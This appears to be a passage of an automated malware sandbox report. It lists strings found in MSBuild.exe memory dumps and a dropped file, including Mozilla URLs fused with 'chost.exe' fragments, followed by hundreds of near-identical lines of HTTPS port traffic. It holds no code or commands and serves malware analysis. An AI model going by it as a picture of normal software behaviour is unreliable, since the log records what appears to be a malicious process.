Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 51342 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51365 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51445 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51548 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51491 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51353 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51399 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51410 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51559 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51513 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51480 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51456 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51524 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51331 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51306 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51501 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51467 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51492 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51354 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51411 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51319 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51537 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51433 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51376 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51560 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51320 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51387 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51444 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51308 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51490 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51549 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51469 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51375 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51398 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51317 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51478 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51435 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51561 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51364 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51446 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51538 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51329 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51457 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51562 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51363 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51500 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51330 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51397 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51511 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51479 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51427
Source: unknown Network traffic detected: HTTP traffic on port 51488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51548
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51428
Source: unknown Network traffic detected: HTTP traffic on port 51465 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51549
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51304
Source: unknown Network traffic detected: HTTP traffic on port 51299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51425
Source: unknown Network traffic detected: HTTP traffic on port 51442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51546
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51547
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51429
Source: unknown Network traffic detected: HTTP traffic on port 51327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51309
Source: unknown Network traffic detected: HTTP traffic on port 51362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51420
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51541
Source: unknown Network traffic detected: HTTP traffic on port 51304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51423
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51544
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51545
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51421
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51542
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51543
Source: unknown Network traffic detected: HTTP traffic on port 51545 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51516 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51407 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51317
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51438
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51559
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51439
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51315
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51436
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51557
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51316
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51558
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51319
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51430
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51551
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51310
Source: unknown Network traffic detected: HTTP traffic on port 51374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51550
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51313
Source: unknown Network traffic detected: HTTP traffic on port 51418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51434
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51555
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51435
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51556
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51553
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51433
Source: unknown Network traffic detected: HTTP traffic on port 51527 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51554
Source: unknown Network traffic detected: HTTP traffic on port 51316 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51477 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51385 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51449
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51329
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51447
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51448
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51441
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51442
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51563
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51560
Source: unknown Network traffic detected: HTTP traffic on port 51419 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51440
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51561
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51324
Source: unknown Network traffic detected: HTTP traffic on port 51396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51445
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51446
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51322
Source: unknown Network traffic detected: HTTP traffic on port 51430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51323
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51565
Source: unknown Network traffic detected: HTTP traffic on port 51453 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51339
Source: unknown Network traffic detected: HTTP traffic on port 51464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51489 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51337
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51458
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51338
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51459
Source: unknown Network traffic detected: HTTP traffic on port 51384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51331
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51453
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51450
Source: unknown Network traffic detected: HTTP traffic on port 51303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51330
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51451
Source: unknown Network traffic detected: HTTP traffic on port 51504 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51335
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51456
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51457
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51333
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51454
Source: unknown Network traffic detected: HTTP traffic on port 51546 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51334
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51455
Source: unknown Network traffic detected: HTTP traffic on port 51373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51460
Source: unknown Network traffic detected: HTTP traffic on port 51339 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51515 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51557 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51505
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51502
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51503
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51508
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51509
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51506
Source: unknown Network traffic detected: HTTP traffic on port 51337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51507
Source: unknown Network traffic detected: HTTP traffic on port 51503 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51500
Source: unknown Network traffic detected: HTTP traffic on port 51526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51501
Source: unknown Network traffic detected: HTTP traffic on port 51535 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51558 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51372 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51455 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51515
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51516
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51513
Source: unknown Network traffic detected: HTTP traffic on port 51305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51514
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51519
Source: unknown Network traffic detected: HTTP traffic on port 51466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51487 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51517
Source: unknown Network traffic detected: HTTP traffic on port 51361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51518
Source: unknown Network traffic detected: HTTP traffic on port 51326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51511
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51512
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51510
Source: unknown Network traffic detected: HTTP traffic on port 51498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51408 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51421 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51405
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51526
Source: unknown Network traffic detected: HTTP traffic on port 51547 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51406
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51527
Source: unknown Network traffic detected: HTTP traffic on port 51383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51524
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51404
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51525
Source: unknown Network traffic detected: HTTP traffic on port 51360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51409
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51407
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51528
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51408
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51529
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51522
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51520
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51400
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51521
Source: unknown Network traffic detected: HTTP traffic on port 51476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51499 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51409 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51443 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51514 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51420 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51537
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51417
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51538
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51535
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51415
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51536
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51539
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51419
Source: unknown Network traffic detected: HTTP traffic on port 51338 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51530
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51412
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51533
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51410
Source: unknown Network traffic detected: HTTP traffic on port 51525 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51531
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51411
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51532
Source: unknown Network traffic detected: HTTP traffic on port 51454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51386
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51385
Source: unknown Network traffic detected: HTTP traffic on port 51507 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51390
Source: unknown Network traffic detected: HTTP traffic on port 51451 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown Network traffic detected: HTTP traffic on port 51474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51497 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51392
Source: unknown Network traffic detected: HTTP traffic on port 51554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51531 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51462 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51397
Source: unknown Network traffic detected: HTTP traffic on port 51301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51398
Source: unknown Network traffic detected: HTTP traffic on port 51565 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51399
Source: unknown Network traffic detected: HTTP traffic on port 51347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51543 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51295
Source: unknown Network traffic detected: HTTP traffic on port 51348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51405 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51518 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51529 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51299
Source: unknown Network traffic detected: HTTP traffic on port 51427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51475 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51348
Source: unknown Network traffic detected: HTTP traffic on port 51417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51469
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51349
Source: unknown Network traffic detected: HTTP traffic on port 51484 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51342
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51463
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51343
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51464
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51461
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51341
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51462
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51467
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51347
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51468
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51465
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51466
Source: unknown Network traffic detected: HTTP traffic on port 51369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51470
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51471
Source: unknown Network traffic detected: HTTP traffic on port 51346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51357 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51441 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51359
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51353
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51474
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51475
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51351
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51472
Source: unknown Network traffic detected: HTTP traffic on port 51506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51473
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51357
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51478
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51358
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51479
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51355
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51476
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51356
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51477
Source: unknown Network traffic detected: HTTP traffic on port 51544 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51429 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51360
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51481
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51361
Source: unknown Network traffic detected: HTTP traffic on port 51473 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51482
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51480
Source: unknown Network traffic detected: HTTP traffic on port 51517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51555 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51440 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51358 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51463 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51364
Source: unknown Network traffic detected: HTTP traffic on port 51302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51485
Source: unknown Network traffic detected: HTTP traffic on port 51505 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51365
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51362
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51483
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51484
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51368
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51489
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51369
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51366
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51487
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51367
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51488
Source: unknown Network traffic detected: HTTP traffic on port 51528 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51492
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51493
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51491
